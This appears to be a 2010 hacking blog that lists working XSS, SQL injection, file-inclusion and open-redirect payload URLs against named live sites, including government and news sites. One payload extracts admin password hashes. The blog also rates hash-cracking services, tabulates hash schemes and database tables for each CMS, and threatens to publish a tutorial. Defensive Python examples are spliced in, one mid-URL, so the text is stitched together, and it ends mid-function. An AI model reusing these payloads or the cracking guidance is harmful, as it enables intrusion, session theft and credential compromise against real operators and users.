OraOLEDB error '80004005'

ORA-01756: stringa tra virgolette terminata in modo irregolare (quoted string not properly terminated)

/notiziario/archivio.asp, line 378
--------




http://www.vigilfuoco.it/informazioni/uffici_territorio/direzioni.asp?reg=7
----------------------------
Microsoft OLE DB Provider for ODBC Drivers error '80040e14'

[Microsoft][ODBC SQL Server Driver][SQL Server]Virgoletta di chiusura mancante prima della stringa di caratteri ''. (Unclosed quotation mark before the character string ''.)

/informazioni/uffici_territorio/direzioni.asp, line 225
----------------------------
-------------------------------------------------------------------------------------------------------

--------------------------NEW---------------------------------------------
Oracle DB SQL injection

http://www.vigilfuoco.it/informazioni/uffici_territorio/GestioneSiti/homepageTemplate.asp?s=361{SQL INJECTION HERE}&p=1041

http://www.vigilfuoco.it/sitiVVF/vercelli/notizia.aspx?codnews=12908&s=361{SQL INJECTION HERE}

http://www.vigilfuoco.it/sitiVVF/vercelli/uffici.aspx?s=361{SQL INJECTION HERE}&p=1044{SQL INJECTION HERE}


Friday, 30 April 2010

vatican.va | XSS - SQL injection - system compromise

Yes, it could be done.
More information soon on this blog (remember... no defacements, no data retrieval, no bad things).


Meanwhile I've found this simple XSS (put a payload in any text box)

http://asv.vatican.va/cercait/index.php?advanced=1
 "><video src=1 onerror=alert(document.cookie)>

Anyway, I'm playing with something else that is more interesting.

http://www.gossipnews.it | xss

XSS in almost all the pages

--------------------------OLD-----------------------
http://www.gossipnews.it/cinema/vedifoto.php?id=3cbd57ad5223375ca2a5089283966818&num=19%3Cscript%3Ealert(document.cookie);%3C/script%3E&

http://www.gossipnews.it/musica/gli_zero_assoluto_fotorw.html?id=5ccabcbfb5861ba35a6b271c76a5ade0&num=5%3Cscript%3Ealert(document.cookie);%3C/script%3E%3C%22

open redirect to any location (attacker-controlled Location header)
http://www.gossipnews.it/open/www/delivery/ck.php?oaparams=2__bannerid=537__zoneid=50__cb=1812239d6e__oadest=http%3A%2F%2Fwww.google.com
--------------------------------------NEW -------------------------------
http://www.gossip.it/news/monografia.php?keyword=ssasdadas"><script>alert(1);</script>

teletu.it | XSS

http://supporto.teletu.it/cerca/?query=%22%3E%3Cscript%3Ealert%28document.cookie%29%3B%3C%2Fscript%3E%3C%22&search=1

XSS in any of the forms
http://www.teletu.it/teletu/nuova-linea.php
http://www.teletu.it/tuttocompreso/offerte/tutto-per-te.php

webnews.it | xss

http://cerca.webnews.it/w.sl?us=fs&q=%22%3E%3Cscript%3Ealert%281%29%3B%3C%2Fscript%3E%3C%22&t=webnews&cat=

cia.gov | XSS

The <> characters are not allowed, but " and = get through, so we can close the value attribute of the <input> tag and add a style that enlarges the field plus an onMouseOver handler: the JavaScript fires as soon as the mouse passes over the (enlarged) text input.
Other things are possible too, but this should be enough.

https://www.cia.gov/search?q=%22%20style%3d%22height:900px;%22%20onMouseOver%3d%22alert(document.cookie)



www.adnkronos.com | XSS - Local file inclusion (php)

XSS

modifies the script inside the setTimeout (fires after 300000 ms)
http://www.adnkronos.com/IGN/Zoom/?id=3.0.4217592951');alert(document.cookie+'
http://www.adnkronos.com/IGN/Zoom/?id=3.0.4217592951');alert(document.cookie);",1);setTimeout("alert('

Local File Inclusion
The same problem is present in several parts of the website, even if blind (no error in the output).
http://www.adnkronos.com/IGN/Zoom/?id=

sample error (with a ' appended)
Warning: include(news/3.0.4217592951\'.inc.php) [function.include]: failed to open stream: No such file or directory in /opt/apache2/www60/IGN/Zoom/index.php on line 11

Warning: include() [function.include]: Failed opening 'news/3.0.4217592951\'.inc.php' for inclusion (include_path='.:/usr/share/php:/usr/share/pear') in /opt/apache2/www60/IGN/Zoom/index.php on line 11

The error doesn't always appear. Probably the responses come from different servers and only one of them shows errors in the output. I'm not really sure and I'm not doing any further testing (files are included and executed for sure).

www.opensourcecms.com www.tradepub.com | several XSS

Several XSS all over the website (more than those listed).


samples (the XSS goes after the id, or the page will redirect)

http://php.opensourcecms.com/scripts/details.php?scriptid=339%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E%3Cval=&name=Mac's%20CMS

http://php.opensourcecms.com/scripts/show.php?catid=1%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E%3C&cat=CMS%20/%20Portals

http://php.opensourcecms.com/news/index.php?page=2%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E%3C&sortby=dateasc

http://php.opensourcecms.com/scripts/details.php?scriptid=19%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E%3C&name=e107
 
sample on tradepub.com, closing the HTML comment
http://php-opensourcecms.tradepub.com/?pt=cat&page=Cons--%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E%3C!-- 




There are several others.

Thursday, 29 April 2010

Portable Oracle XE - Help needed

I'm working on a portable version of Oracle XE (Express Edition, server) for Windows. The NSIS script and all the relevant files will be released as open source (no specific license will be used).
I will gladly share the gathered data: the list of binary files, the registry files (.reg), etc.
At the moment I'm still collecting the registry modifications, which are a lot, especially for the registered components.
The Oracle installer also modifies group policies; I've only seen them and still don't know how much time they will require.
The Oracle ODBC installation is half working.
Obviously the final version will not include Oracle's binary files.

I have a static version, with fixed paths.
If someone is interested in helping me, please leave a comment.

lostregone.net | XSS, file inclusion

The XSS got through despite some server-side checks.

http://www.lostregone.net/index.php?words=<video src=1 onerror=alert(String.fromCharCode(112,97,115,115,101,100))>&where=1&go=Vai!&rate=5&id=5062&cal_month=Apr&cal_year=2010&submitted=true&address=Indirizzo+E-mail&action=add

File inclusion (the script is Liga Manager Online)
http://www.lostregone.net/GSC/gsc.php?action=table&tabtype=0&file=..
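An added example, not part of the original posts: the include problems reported above for sviluppoeconomico.gov.it (tema_dir=../index.php with \0\0 appended), adnkronos.com (id concatenated into include('news/<id>.inc.php')) and lostregone.net (file=..) are the same bug, a request parameter glued onto a file path. The Python below puts that pattern beside a hardened resolver. The directory name is taken from the adnkronos error message purely as a base-path string (nothing is read from disk); the allowed identifier pattern is an assumption modelled on the ids seen in those URLs, and the probe inputs are constructed.

```python
import os
import re

# Base directory taken from the error message quoted above; used only as a string.
NEWS_DIR = "/opt/apache2/www60/IGN/Zoom/news"

# Allowed shape of an article id such as 3.0.4217592951 (an assumption).
_ID_RE = re.compile(r"^[0-9]+(\.[0-9]+)*$")


def include_path_weak(base, ident):
    """What the vulnerable code effectively does: concatenate and include."""
    return os.path.join(base, ident + ".inc.php")


def include_path_safe(base, ident):
    """Resolve ident to a file inside base, or raise ValueError.

    Three independent checks: reject NUL bytes (the classic way to cut off
    the appended '.inc.php'), accept only identifiers of the expected shape,
    and confirm that the canonical path is still under base after '..' and
    symlinks are resolved. Any one of them stops the probes below; keeping
    all three means a mistake in one does not reopen the hole."""
    if "\0" in ident:
        raise ValueError("NUL byte in identifier")
    if not _ID_RE.match(ident):
        raise ValueError("identifier does not match the allowed pattern")
    base_real = os.path.realpath(base)
    target = os.path.realpath(os.path.join(base_real, ident + ".inc.php"))
    if os.path.commonpath([base_real, target]) != base_real:
        raise ValueError("resolved path escapes the include directory")
    return target


def check_inputs(resolver, base, idents):
    """Run a resolver over candidate ids; return {id: resolved path or rejection text}."""
    results = {}
    for ident in idents:
        try:
            results[ident] = resolver(base, ident)
        except ValueError as e:
            results[ident] = f"rejected: {e}"
    return results


# Constructed probes: a legitimate id, a traversal, a NUL-byte truncation
# attempt and an absolute path (os.path.join discards base for the last one).
PROBES = ["3.0.4217592951", "../index.php", "../index.php\0", "/etc/passwd"]

if __name__ == "__main__":
    for name, fn in (("weak", include_path_weak), ("safe", include_path_safe)):
        print(f"--- {name} ---")
        for ident, out in check_inputs(fn, NEWS_DIR, PROBES).items():
            print(f"{ident!r:22} -> {out}")
```

The weak resolver happily returns a path containing `..`, and for the absolute-path probe it returns `/etc/passwd.inc.php` because os.path.join (like PHP's string concatenation with a leading slash in the include) drops the base entirely; the safe resolver rejects all three hostile probes and returns a path under NEWS_DIR for the real id.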

www.ilsannioquotidiano.it | XSS Sql Injection

An old PHP-Nuke bug. Nothing fun.

XSS
http://www.ilsannioquotidiano.it/sections.php?op=printpage&artid=1%3Cscript%3Ealert(document.cookie);%3C/script%3E

old PHP-Nuke SQL injection
http://www.ilsannioquotidiano.it/sections.php?op=printpage&artid=-9999999/%3Cscript%3E**%20%20/union/**/select/**/aid,pwd/**/from/**/nuke_authors/*

ilquaderno.it | XSS

http://www.ilquaderno.it/commenta-articolo.php?idart=46069%22%3E%3Cscript%3Ealert(document.cookie);%3C/script%3E

http://www.ilquaderno.it/qsearch.php?q=%3Cscript%3Ealert(1);%3C/script%3E

Blind SQL injection (in the above links). The site relies only on addslashes or magic_quotes_gpc, which can be bypassed.

http://search.usa.gov how funny is the title!

http://search.usa.gov/search?query=funny%3C/title%3E%3C/head%3E%3Cbody%3E%3Cvideo%20src=1%20onerror=alert(document.cookie)%3E%3C/body%3E%3C/html%3E%3C!--


http://search.usa.gov/search?query=funny</title></head><body><video src=1 onerror=alert(document.cookie)></body></html><!--


So the search reflects anything into the page <title> without encoding it.
I just added the closing tags of the head section (</title></head>), an opening <body>, the script I want, the closing tags (</body></html>) and finally an opening comment (<!--) that swallows the rest of the original page.
Quite funny: anybody can create a phishing page on a usa.gov domain or grab the users' sessions (if I have time I will explain it in a simulation with a video; don't worry about the fact that you cannot have an account).
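An added example, not part of the original posts: both the cia.gov case above (angle brackets removed, but a quote still closes the value attribute) and this search.usa.gov case (nothing encoded, so </title> ends the title and the rest of the payload becomes markup) are output-encoding failures, and which one works depends on where the value lands. The Python below renders a search term into a page the way those sites did, under three encoders, and uses Python's own HTML parser to check which payloads survive each one. The page template and the payload strings are constructed for the demo; html.escape is the correct choice for both contexts.

```python
import html
import re
from html.parser import HTMLParser


def no_encoding(s):
    return s


def strip_angle_brackets(s):
    """The kind of filter that blocks <script> and nothing else."""
    return re.sub(r"[<>]", "", s)


def html_encode(s):
    """Correct encoding for text nodes and double-quoted attribute values."""
    return html.escape(s, quote=True)


def render_results_page(query, encode):
    """Reflect the search term into the <title> and into the input's value
    attribute, the two places the posts above abuse (constructed template)."""
    q = encode(query)
    return (f"<html><head><title>Search: {q}</title></head><body>"
            f'<form><input type="text" name="q" value="{q}"></form>'
            f"</body></html>")


class _Probe(HTMLParser):
    """Collect every start tag seen and the attributes of the search input."""
    def __init__(self):
        super().__init__()
        self.tags, self.input_attrs = [], {}

    def handle_starttag(self, tag, attrs):
        self.tags.append(tag)
        if tag == "input":
            self.input_attrs = dict(attrs)


def xss_probe(markup):
    """Return (event handler injected into <input>?, set of injected tags)."""
    p = _Probe()
    p.feed(markup)
    p.close()
    handler = any(k.startswith("on") for k in p.input_attrs)
    injected = {"script", "video", "img", "iframe"} & set(p.tags)
    return handler, injected


# Constructed payloads modelled on the two posts: an attribute break-out that
# needs no angle brackets, and a title break-out that does.
ATTRIBUTE_PAYLOAD = '" style="height:900px;" onMouseOver="alert(document.cookie)'
TITLE_PAYLOAD = ("funny</title></head><body>"
                 "<video src=1 onerror=alert(document.cookie)></body></html><!--")


def evaluate(encode):
    """Which of the two payloads get through a given encoder."""
    attr_hit, _ = xss_probe(render_results_page(ATTRIBUTE_PAYLOAD, encode))
    _, tags = xss_probe(render_results_page(TITLE_PAYLOAD, encode))
    return {"attribute_breakout": attr_hit, "title_breakout": "video" in tags}


if __name__ == "__main__":
    for enc in (no_encoding, strip_angle_brackets, html_encode):
        print(f"{enc.__name__:20} {evaluate(enc)}")
```

Stripping angle brackets stops the title payload but leaves the attribute payload fully working, which is the cia.gov situation; only encoding the quote as well (html.escape with quote=True) closes both, and note that the encoding must be applied at output time, per context, not as a request filter.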

-----------------------------------------------------
If I have a bit of time I will finish and publish my thoughts about social engineering with a real example (this one?) and other methods to get more privileges.

Hints -
The usa.gov URL shortener runs on Drupal
http://go.usa.gov/shorturl/user/1 <- All the accounts are connected and the usernames can be retrieved easily (this is normal... by design)
http://go.usa.gov/robots.txt <- Drupal with all the installation files. Only some folders and files are forbidden.
PHP  5.2.12 (read write on
They use the same methods as on drupa.ly.
-----------------------------------------------------

They don't reply to my emails... and the problems from a previous post have never been patched, especially the remote code execution. Maybe if I post a tutorial a swarm of kids will start to play with their site.
Governments are slow as hell and never patch until someone tries to deface them (not me, for sure) or someone else asks them for money for their "security" (not me in this case either...).

What a mad world.



----------------------------------------------------------------
Blarg!!!!
Let me add a song to this boring and useless post that I'm forced to truncate.
These words explain what I think right now.

****
...
And I find it kinda funny I find it kinda sad
The dreams in which I'm dying
Are the best I've ever had
I find it hard to tell you
I find it hard to take
When people run in circles
It's a very, very mad world mad world
...


Tuesday, 27 April 2010

Online hash Crackers and Generators with ratings

Personal ratings. Links taken from google.

-Online hash Generators-
http://www.insidepro.com/hashes.php?lang=eng | almost any kind - maybe the best around
http://nediam.com.mx/winhashes/search_nt_hash.php | NTLM/LM - excellent
http://funprogs.topcities.com/hashgen.htm | NTLM/LM - good



-Online hash Crackers-
http://www.md5cracker.tk/ | MD5 - excellent - search on several md5 crack websites
http://www.google.com | excellent - several websites have an md5 or sha1 hash in the title or the url
http://www.yahoo.com | excellent - several websites have an md5 or sha1 hash in the title or the url
http://md5.hashcracking.com | MD5 - excellent - ~50,529,455,839 predefined hashes
http://www.tobtu.com/md5.php | MD5 - excellent
http://www.c0llision.net/ | MD5/NTLM/LM - excellent - requests via irc with several hashes - irc.after-all.org #md5crack
http://nediam.com.mx/winhashes/search_nt_hash.php | NTLM/LM - excellent
http://md5.rednoize.com/ | MD5/SHA1 - excellent
http://www.cmd5.org/ | MD5/md5(md5($pass))/sha1/md4/mysql/mysql5/md5($pass.$salt)/md5($salt.$pass)/md5(md5($pass).$salt)/md5(md5($salt).$pass)/md5($salt.$pass.$salt)/md5($salt.md5($pass))/md5(md5($pass).md5($salt))/md5(md5($salt).md5($pass))/sha1($username.$pass) - good
http://md5.overclock.ch/ | MD5 - good - server irc.rizon.net #md5
http://tools.benramsey.com/md5/ | MD5 - good - reverse hash
http://www.thepanicroom.org/index.php?view=md5 | MD5 - good - search on several md5 crack websites
http://sec-war.com/md5.php | MD5 - good - search on several md5 crack websites
http://passcracking.com | MD5 - good - w/ fast queue
http://www.md5decrypter.co.uk/ | NTLM/MD5/SHA1 - good (w/ captcha) multiple hashes (8)
http://gdataonline.com | MD5 - good - w/ multiple hashes (5)
http://www.cloudcracker.net | MD5/SHA1 - good
http://opencrack.hashkiller.com | MD5 - good - downloadable wordlist
http://www.md5this.com/crack-it-/index.php | MD5 - good - predefined+cracking - captcha(not working with opera)
http://www.md5crack.com | MD5 - medium
http://md5.thekaine.de | MD5 - medium - meta search engine
http://milw0rm.com/cracker/ | MD5/LM - poor (you need to wait for the spots) - decent wordlist
http://stupidsite.org/cracker/md5_cracker.php | MD5 - poor - predefined hashes
http://www.netmd5crack.com/cracker/ | MD5 - poor - predefined hashes
http://md5decryption.com | MD5 - poor - predefined hashes
http://www.bigtrapeze.com/md5/ | MD5 - poor - not updated; few results
http://md5hack.com/ | MD5 - poor
http://www.macrosoftware.ro/md5/index.php | MD5 - poor
http://www.md5decrypter.com/ | MD5 - poor
http://www.md5encryption.com/ | MD5 - poor
http://www.plain-text.info/ | MD5/LM/NTLM/MySQL v2.32/SHA1 - requests via irc - irc.rizon.net #rainbowcrack
http://www.hashchecker.com/index.php?_sls=add_hash | MD5 - Paid Service with 99,99% of results (?) - poor
http://md5.idiobase.de/ | MD5 - very poor
http://alimamed.pp.ru/md5/ | MD5 - poor
http://bokehman.com/cracker/ | MD5 - poor
http://www.schwett.com/md5/ | MD5 - poor
http://md5.allfact.info/ | MD5 - poor
http://www.mmkey.com/md5/home.php | MD5/SHA256/ - mostly useless
http://www.xmd5.org/ | MD5 - poor
http://www.tmto.org/ | MD5 - seems to be good - ~308,288,137,504 predefined hashes - not tested
http://www.tydal.nu/article/md5-crack/ | MD5 - not tested/not working
http://cracker.kalkulators.org | MD5/SHA1/SHA256/LM/NTLM - medium - meta search engine - nice looking interface

http://www.farefuturofondazione.it/ http://www.ffwebmagazine.it | XSS

Several XSS (no reason to list them all)

http://www.ffwebmagazine.it/ffw/page.asp?VisImg=S&Art=5592&Cat=1&I=e.gif%22 onerror="alert(document.cookie)" &IdTipo=0&TitoloBlocco=Attualit%C3%A0&Codi_Cate_Arti=24

http://www.ffwebmagazine.it/ffw/Page.asp?Cat=Archivio&Tipo=UltimeNotizie&AlreadySelected=n&IdTipo=0&Codi_Cate_Arti=23&TitoloBlocco=Economia"></a><img src=1 onerror="alert(document.cookie)"><a href="&IdMenu=80&NomeMenu=Economia

http://www.ffwebmagazine.it/ffw/Page.asp?Cat=Archivio&Tipo=UltimeNotizie&AlreadySelected=y&IdTipo=0&Codi_Cate_Arti=50&TitoloBlocco=%3Cvideo%20src=1%20onerror=alert(document.cookie)%3E%3EIn%20Primo%20Piano

http://www.farefuturofondazione.it/ff/Page.asp?Cat=Archivio&Tipo=UltimeNotizie&ASL=y&IdTipo=0&CCA=43&TB=Pubblicazioni%3Cvideo%20src=1%20onerror=alert(document.cookie)%3E

http://www.farefuturofondazione.it/ff/page.asp?StrMotore=dada"><video src=1 onerror=alert(1)><"&Cat=Motore

Hashes Algorithms used in different web applications

I've done this list by hand. Not all the hash algorithms are correct (I've generically put md5 or ??? where it is unknown).
If you are interested, send corrections and I will update it.
I will also publish a better version with tabs.
You can reproduce it without problems. It's part of the mdcrack gui project on SourceForge.
Use | as the data separator.

-----------------------------------------------------------------------------------------------------------------------------------------------------
| Title | Hash Algorithm | TablePrefix | Table Name | Website |
-----------------------------------------------------------------------------------------------------------------------------------------------------
| 1C Битрикс | md5($pass) | | |http://www.1c-bitrix.ru/
| 1024cms | md5($pass) | | |http://www.1024cms.org/
| 4images | md5($pass) | | |http://www.4homepages.de/
| AboCMS | md5($pass) | ??? | users |http://www.abocms.com/
| AdaptCMS Lite | md5($pass) | | |http://www.adaptcms.com/
| Adrevenue | md5($pass) | | |http://www.adrevenue.co.uk/
| AEF | md5($salt.$pass) | | |http://www.anelectron.com/board/
| AIOCP | md5($pass) | | |http://www.aiocp.it/
| Artiphp | md5($pass) | | |http://www.artiphp.com/
| AVE CMS | md5(md5($pass)) | | |http://www.cmsmatrix.org/ave-cms
| b2evolution | md5($pass) | | |http://b2evolution.net/
| Basecmp | md5($pass) | | |http://www.basecmp.de/
| bbPress | md5($pass) | | |http://bbpress.org/
| beContent | md5($pass) | | |http://code.google.com/p/becontent
| Beehive | md5($pass) | ??? | User |http://www.magnettechnologies.com/products.htm
| BIGACE | md5($pass) | ????????? | |http://www.bigace.de/
| Bitrix | md5($pass) | | |http://www.bitrixsoft.com/
| bitweaver | md5($pass) | | |http://www.bitweaver.org/
| Black Pig (Sajon) | md5($pass) | | |http://www.blackpig.co.uk ????
| bloofoxCMS | md5($pass) | | |http://www.bloofox.com/
| ClanTiger | md5($pass) | | |http://www.clantiger.com/
| ClanSphere | md5($pass) or sha1($pass) | | |http://www.csphere.eu/
| CMScout | md5($pass) | | |http://www.cmscout.co.za/
| CMS Made Simple | md5($pass) | | |http://www.cmsmadesimple.org/
| Concrete5 | md5($pass) | | |http://www.concrete5.org/
| Constructr CMS | md5($pass) | | |http://constructr-cms.org/
| Contenido | md5($pass) | | |http://www.contenido.org/
| Contentteller CE | md5($pass) | | |http://www.contentteller.com/
| Coppermine PG | md5($pass) | | |http://coppermine-gallery.net/
| CPG-Nuke | md5($pass) | | |http://dragonflycms.org/
| CruxCMS | md5($pass) | | |http://www.cruxsoftware.co.uk/
| CustomerInfo | md5($pass) | | |
| DanneoCMS | md5($pass) | dn[версия]_ | users |http://www.danneo.com
| DataLife Engine | md5(md5($pass)) | dle_ | users |http://dlecms.com/
| DBHcms | md5($pass) | | |http://www.drbenhur.com/
| DeluxeBB | md5($pass) | | |http://www.deluxebb.com/
| Diferior | md5(md5($pass)) | | |http://diferior.com/
| Digitalus | md5($pass) | | |http://digitaluscms.com/
| DotNetNuke | sha1($pass) | | |http://www.dotnetnuke.com/
| Drupal | md5($pass) | | |http://drupal.org/
| e107 | md5(md5($pass)) | e107_ | user |http://e107.org/
| eazyPortal | md5($pass) | | |http://www.eazyportal.com/
| ecshoprus | md5($pass) | | |http://ecshoprus.ru/
| eLinks | md5($pass) | | |http://elinks.or.cz/
| eliteCMS | sha1($pass) | | |http://www.elitecms.com/
| Elxis | md5($pass) | | |http://www.elxis.org/
| Enano CMS | md5($pass) | | |http://enanocms.org/
| eoCMS | md5($pass) | | |http://eocms.com/
| Etomite | md5($pass) | | |http://www.etomite.org/
| Explay | md5($pass) | | |
| Exponent | md5($pass) | | |http://www.exponentcms.org/
| Flux CMS | md5($pass) | | |https://fosswiki.liip.ch/display/FLX/
| Frog | sha1($pass) | | |http://www.madebyfrog.com/
| FUDforum | md5($pass) | | |http://fudforum.org/
| Fundanemt | md5($pass) | | |http://www.fundanemt.com/
| glFusion | md5($pass) | | |http://www.glfusion.org/
| GeekLog | md5($pass) | | |http://www.geeklog.net/
| html-edit CMS | md5($pass) | | |http://www.html-edit.org
| Icy Phoenix | md5($pass) | | |http://www.icyphoenix.com/
| iDevAffiliate | sha1(idev_secret.$password) | | |http://www.idevdirect.com/
| iGaming | md5($pass) | | |http://www.igamingcms.com/
| ImpressCMS | md5($pass) | | |http://www.impresscms.org/
| Injader | md5($pass) | | |http://www.injader.com/
| Intellect Board | md5($pass) | ??? | User |http://intboard.ru/
| IPB 1.x.x | md5($pass) | ibf_ | members |http://www.invisionpower.com/
| IPB 2.x.x | md5(md5($salt).md5($pass)) | ibf_ | members_converge|http://www.invisionpower.com/
| ITA Forum | md5($pass) | itaf_ | user |https://sourceforge.net/projects/itaforum/
| Jaws CMS | md5($pass) | | |http://www.jaws-project.com/
| Joomla <=1.0.12 | md5($pass) | jos_ | users |http://www.joomla.org/
| Joomla >=1.0.13 | md5($pass.$salt) | jos_ | users |http://www.joomla.org/
| Kajona | sha1($pass) | | |http://www.kajona.de/
| KerviNet Forum | md5($pass) | | |http://photoweb.com.ua/
| Koobi CMS | md5($pass) | koobi_ | user |http://www.dream4.de/
| Koobi CMS >= 6 | md5(md5($pass)) | koobi_ | user |http://www.dream4.de/
| Lanius CMS | md5($pass) | | |http://www.laniuscms.org/
| LifeType | md5($pass) | | |http://www.lifetype.net/
| Mambo | md5($pass) | | |http://mambo-foundation.org/
| MDPro | md5($pass) | | |http://www.maxdev.com/
| MercuryBoard | md5($pass) | mb_ | users |http://mercuryboard.com/
| MiaCMS | md5($pass) | | |http://miacms.org/
| MigasCMS | md5($pass) | | |http://www.sebrac.webcindario.com/
| MiniBB | md5($pass) | minibbtable_| users |http://www.minibb.com/
| MODx CMS | md5($pass) | | |http://modxcms.com/
| Monkey CMS | md5($pass) | | |http://www.monkeycms.com/
| myBB 1.2.x | md5(md5($salt).md5($pass)) | mybb_ | users |http://www.mybboard.net/
| Nucleus | md5($pass) | | |http://nucleuscms.org/
| osCommerce | md5($salt.$pass) | ??? | customers |http://www.oscommerce.com/
| ocPortal | md5($pass) | | |http://ocportal.com/
| OneCMS | md5($pass) | | |http://www.onecms.it/
| OpenBB 1.0.8 | md5($pass) | | |http://www.openbb.com/
| PBLang | md5($pass) | /db/members/| |https://sourceforge.net/projects/pblang/
| Pecio CMS | sha1($pass) | | |http://pecio-cms.com/
| Phenotype CMS | md5($pass) | | |http://www.phenotype-cms.com/
| Phorum 5.0.x | md5($pass) | | |http://www.phorum.org/
| Photopost | md5($pass) | | |http://www.photopost.com/
| phpAds | md5($pass) | | |http://sourceforge.net/projects/phpadsnew/
| PHP-Fusion | md5($pass) | | |http://sourceforge.net/projects/php-fusion/
| PHP-Nuke | md5($pass) | nuke_ | authors |http://phpnuke.org/
| phpBB | md5($pass) | phpbb_ | users |http://www.phpbb.com/
| phpBB >= 3 | md5($phpbb3) | phpbb_ | users |http://www.phpbb.com/
| PhpMyForum | md5($pass) | pmf_ | user |http://phpmyforum.de/
| phpMyAgenda | md5($pass) | | |http://sourceforge.net/projects/phpmyagenda/
| PhpMySport | md5($pass) | | |http://phpmysport.sourceforge.net/
| phpListPro | md5($pass) | | |http://www.smartisoft.com/products.php?product=phpListPro
| PHPSurveyor | md5($pass) | | |http://www.limesurvey.org/
| PunBB 1.2.x | sha1($pass) | ??? | users |http://www.punbb.org/
| PhpWebSite | md5($pass) | | |http://phpwebsite.appstate.edu/
| phpWebThings | md5($pass) | | |http://www.phpwebthings.nl/
| PHPX CMS | md5($pass) | | |http://www.thisrand.com/scripts/phpx
| phpwcms | md5($pass) | | |http://www.phpwcms.de/
| PLUME CMS | md5($pass) | | |http://www.plume-cms.net/
| PostNuke | md5($pass) | | |http://www.postnuke.com/
| Rennder Pixie | md5($pass) | | |http://www.renderpixie.com/
| QuickSilver Forum | md5($pass) | qsf_ | users |http://www.quicksilverforums.com/
| Radiant | sha1(sha1($pass)) | | |http://radiantcms.org/
| Refbase | des($pass,$salt);$salt=substr(email, 0, 2)| | |http://www.refbase.net/
| RunCMS | sha1($username.$pass) | runcms_ | users |http://www.runcms.org/
| Seditio | md5($pass) | | |http://www.neocrome.net/
| Serendipity <=1.4.1 | md5($pass) | | |http://www.s9y.org
| Serendipity >= 1.5 | sha1($pass) | | |http://www.s9y.org
| Shinobu | md5($pass) | | |http://shinobu.61924.nl/
| SilverStripe | md5($pass) | | |http://www.silverstripe.com/
| Slaed CMS | md5($pass) | slaed_ | users |http://www.slaed.net/
| SmallNuke 2 | md5($pass) | | |http://www.smallnuke.com/
| sNews | md5($pass) | | |http://www.snewscms.it/
| SMF 1.0.x | md5(HMAC) | smf_ | members |http://www.simplemachines.org/
| SMF 1.1.x | sha1($username.$pass) | smf_ | members |http://www.simplemachines.org/
| Snitz forums 2000 | SHA-256 | FORUM_ | MEMBERS |http://forum.snitz.com/
| Subrion | md5($pass) | | |http://www.subrion.com/
| TangoCMS | md5($pass) | | |http://tangocms.org/
| Tiki Wiki | md5($pass) | | |http://tikiwiki.org/
| Tinypug | md5($pass) | | |http://code.google.com/p/tinypug/
| TRIBiQ | md5($pass) | | |http://tribiq.com/
| Triton CMS | md5($pass) | | |http://www.tritoncms.com/
| Typo3 | md5($pass) | | |http://typo3.org/
| UseBB | md5($pass) | usebb_ | members |http://www.usebb.net/
| Vanilla | md5($pass) | LUM_ | user |http://www.vanillacms.com/
| vBulletin 2.16 | ??? | | user |http://www.vbulletin.org/
| VBulletin 3.x | md5(md5($pass).$salt) | | user |http://www.vbulletin.org/
| VikingBoard | md5($pass) | vboard_ | member |http://sourceforge.net/projects/vboard/
| Voodoo chat | md5($pass) | | |http://vochat.com/ ?????
| W-Agora | md5($pass) | [***]_ | users |http://www.w-agora.com/
| Website Baker | md5($pass) | | |http://www.websitebaker2.org/
| Webspell | md5($pass) | ws_ Rand(3)_| user |http://www.webspell.org/
| Wordpress | md5($pass) | wp_ | users |http://wordpress.org/download/
| Wordpress >= 2.5 | md5($phpbb3) | wp_ | users |http://wordpress.org/download/
| WWWThreads | DES($pass) | w3t_ | users |http://www.wwwthreads.com/
| Xaraya (XarBB) | md5($pass) | | |http://www.xaraya.com/
| XMB Forum | md5($pass) | ??? | members |http://www.xmbforum.com/
| XOOPS | md5($pass) | xoops_ | users |http://www.xoops.org/
| YaBB | md5(HMAC) | yabbse_ | members |http://www.yabbforum.com/
-----------------------------------------------------------------------------------------------------------------------------------------------------
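As an added example (not part of the original post and not code from any of the listed projects), the common constructions from the table written out in Python, together with a verify routine that checks a password against one of these legacy hashes and, on success, rehashes it with PBKDF2 so the legacy hash can be retired from the database. The user record and passwords are constructed.

```python
"""Legacy web-app password hashes, in the $pass/$salt/$username notation of the
table above, plus a verify-then-upgrade routine. Added example with constructed
data; not code from any of the listed projects."""
import hashlib
import hmac
import os


def md5(s: str) -> str:
    return hashlib.md5(s.encode("utf-8")).hexdigest()


def sha1(s: str) -> str:
    return hashlib.sha1(s.encode("utf-8")).hexdigest()


# Each entry: table formula -> function(password, salt, username) -> hex digest.
# '.' in the formulas is PHP string concatenation, so md5($salt.$pass) is md5(salt + pass).
LEGACY_SCHEMES = {
    "md5($pass)":                 lambda p, s, u: md5(p),
    "sha1($pass)":                lambda p, s, u: sha1(p),
    "md5(md5($pass))":            lambda p, s, u: md5(md5(p)),
    "sha1(sha1($pass))":          lambda p, s, u: sha1(sha1(p)),
    "md5($salt.$pass)":           lambda p, s, u: md5(s + p),
    "md5($pass.$salt)":           lambda p, s, u: md5(p + s),
    "md5(md5($pass).$salt)":      lambda p, s, u: md5(md5(p) + s),
    "md5(md5($salt).md5($pass))": lambda p, s, u: md5(md5(s) + md5(p)),
    "sha1($username.$pass)":      lambda p, s, u: sha1(u + p),
}

MODERN_SCHEME = "pbkdf2_sha256"
PBKDF2_ROUNDS = 600_000  # illustrative work factor; tune it to your hardware


def verify_legacy(scheme: str, password: str, stored_hex: str,
                  salt: str = "", username: str = "") -> bool:
    """Recompute the legacy hash for the candidate and compare in constant time."""
    if scheme not in LEGACY_SCHEMES:
        raise ValueError(f"unknown legacy scheme: {scheme}")
    computed = LEGACY_SCHEMES[scheme](password, salt, username)
    return hmac.compare_digest(computed, stored_hex.lower())


def hash_modern(password: str, rounds: int = PBKDF2_ROUNDS) -> str:
    """Format: pbkdf2_sha256$rounds$salt_hex$dk_hex, with a fresh 16-byte random salt."""
    salt = os.urandom(16)
    dk = hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"), salt, rounds)
    return f"{MODERN_SCHEME}${rounds}${salt.hex()}${dk.hex()}"


def verify_modern(password: str, stored: str) -> bool:
    scheme, rounds, salt_hex, dk_hex = stored.split("$")
    if scheme != MODERN_SCHEME:
        return False
    dk = hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"),
                             bytes.fromhex(salt_hex), int(rounds))
    return hmac.compare_digest(dk.hex(), dk_hex)


def login(record: dict, password: str) -> bool:
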